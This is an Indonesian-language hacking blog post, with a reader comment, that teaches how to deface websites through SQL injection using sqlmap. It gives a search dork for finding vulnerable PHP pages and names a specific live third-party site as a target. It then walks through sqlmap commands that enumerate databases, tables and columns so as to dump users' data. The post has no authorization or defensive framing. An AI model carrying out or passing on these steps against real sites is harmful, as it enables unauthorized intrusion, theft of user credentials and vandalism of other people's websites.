Kali Ini Mimin Bakal Kasih Tutor Gimana Cara Deface Dengan Sqlinjection Dengan Sqlmap Okee
Langsung Aja Tanpa Banyak Bacod :V
Dork : "inurl:/php?id= intext:by Fajri.com"
Exploit : Mikir Sendiri Lah Gan V: biasa kalo eskiel pakek ( ' ) Petik Belakang ID
Untuk Lebih Simple Kita Gunakan SQLMAP :V
W saranin pakek termux / Linux / gitbash ya kak :*
Live Target : http://www.ergo-furniture.com/products.php?id=113
======================================
Perhatian !
-u = untuk url yg dimasukan
--dbs = untuk melihat database
-------------------------------------
-D = untuk melihat tables
--tables = untuk melihat isi tables
-------------------------------------
-T = untuk melihat Kolom
--Columns = untuk melihat isi Columns / KOLOM
-------------------------------------
-C = untuk dump
--dump = tampilkan isi dari dump
========================================
Buka SQLMAPNYA
root@cyb3r00q:/home/arikun/# cd sqlmap
root@cyb3r00q:/home/arikun/sqlmap# python sqlmap.py -u [ nama webnya ] --dbs
abis itu enter
Jika Muncul Pertanyaan Tinggal Pilih Y aja okee :V Agak Lama ? Maklumi sadja okee gan
Langsung aja kita execute:V
root@cyb3r00q:/home/arikun/sqlmap# python sqlmap.py -u [ nama webnya ] -D [ nama db nya ] --tables
Abis Itu Enter Gan
Langsung Yg Kedua Kita Mau Lihat Yg Usersnya
Caranya
root@cyb3r00q:/home/arikun/sqlmap# python sqlmap.py -u [ nama webnya ] -D [ nama db nya ] -T [ nama Tablesnya ] --columns
biasa abis itu enter lagi
Kita mau lihat isi dari tables users
OKee jika udah bakal muncul gini
Untuk Lebih Jelasnya Silahkan Lihat Video [ Klik Disini gan ] Jangan Lupa Like , Komen dan Subscribe yak :*
Thx Onii-chan >///<
Bagi wordlsit nya bang :(
BalasHapus